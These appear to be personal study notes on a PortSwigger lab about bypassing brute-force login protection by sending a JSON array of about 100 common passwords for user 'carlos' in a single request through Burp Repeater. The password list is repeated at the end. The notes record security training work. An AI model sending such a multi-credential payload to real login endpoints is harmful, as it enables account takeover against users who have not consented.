https://portswigger.net/web-security/authentication/password-based#user-rate-limiting



Typically, the IP can only be unblocked in one of the following ways:

    Automatically after a certain period of time has elapsed
    Manually by an administrator
    Manually by the user after successfully completing a CAPTCHA


It is still not completely secure. 

it is sometimes also possible to bypass this defense 
if you can work out how to guess multiple passwords with a single request. 

https://portswigger.net/web-security/authentication/password-based/lab-broken-brute-force-protection-multiple-credentials-per-request

Lab: Broken brute-force protection, multiple credentials per request

Step1- Burp + Foxy

Step2- Send to Burp Repeater > array of strings containin all of the candidate passwords:

"username" : "carlos",
"password" : [
    "123456",
    "password",
    "12345678",
    "qwerty",
    "123456789",
    "12345",
    "1234",
    "111111",
    "1234567",
    "dragon",
    "123123",
    "baseball",
    "abc123",
    "football",
    "monkey",
    "letmein",
    "shadow",
    "master",
    "666666",
    "qwertyuiop",
    "123321",
    "mustang",
    "1234567890",
    "michael",
    "654321",
    "superman",
    "1qaz2wsx",
    "7777777",
    "121212",
    "000000",
    "qazwsx",
    "123qwe",
    "killer",
    "trustno1",
    "jordan",
    "jennifer",
    "zxcvbnm",
    "asdfgh",
    "hunter",
    "buster",
    "soccer",
    "harley",
    "batman",
    "andrew",
    "tigger",
    "sunshine",
    "iloveyou",
    "2000",
    "charlie",
    "robert",
    "thomas",
    "hockey",
    "ranger",
    "daniel",
    "starwars",
    "klaster",
    "112233",
    "george",
    "computer",
    "michelle",
    "jessica",
    "pepper",
    "1111",
    "zxcvbn",
    "555555",
    "11111111",
    "131313",
    "freedom",
    "777777",
    "pass",
    "maggie",
    "159753",
    "aaaaaa",
    "ginger",
    "princess",
    "joshua",
    "cheese",
    "amanda",
    "summer",
    "love",
    "ashley",
    "nicole",
    "chelsea",
    "biteme",
    "matthew",
    "access",
    "yankees",
    "987654321",
    "dallas",
    "austin",
    "thunder",
    "taylor",
    "matrix",
    "mobilemail",
    "mom",
    "monitor",
    "monitoring",
    "montana",
    "moon",
    "moscow"

]

Step3- Right-click request + select Show response in browser.

Step4- Copy the URL and load it in the browser.

Lab solved

"123456"
"password"
"12345678"
"qwerty"
"123456789"
"12345"
"1234"
"111111"
"1234567"
"dragon"
"123123"
"baseball"
"abc123"
"football"
"monkey"
"letmein"
"shadow"
"master"
"666666"
"qwertyuiop"
"123321"
"mustang"
"1234567890"
"michael"
"654321"
"superman"
"1qaz2wsx"
"7777777"
"121212"
"000000"
"qazwsx"
"123qwe"
"killer"
"trustno1"
"jordan"
"jennifer"
"zxcvbnm"
"asdfgh"
"hunter"
"buster"
"soccer"
"harley"
"batman"
"andrew"
"tigger"
"sunshine"
"iloveyou"
"2000"
"charlie"
"robert"
"thomas"
"hockey"
"ranger"
"daniel"
"starwars"
"klaster"
"112233"
"george"
"computer"
"michelle"
"jessica"
"pepper"
"1111"
"zxcvbn"
"555555"
"11111111"
"131313"
"freedom"
"777777"
"pass"
"maggie"
"159753"
"aaaaaa"
"ginger"
"princess"
"joshua"
"cheese"
"amanda"
"summer"
"love"
"ashley"
"nicole"
"chelsea"
"biteme"
"matthew"
"access"
"yankees"
"987654321"
"dallas"
"austin"
"thunder"
"taylor"
"matrix"
"mobilemail"
"mom"
"monitor"
"monitoring"
"montana"
"moon"
"moscow"
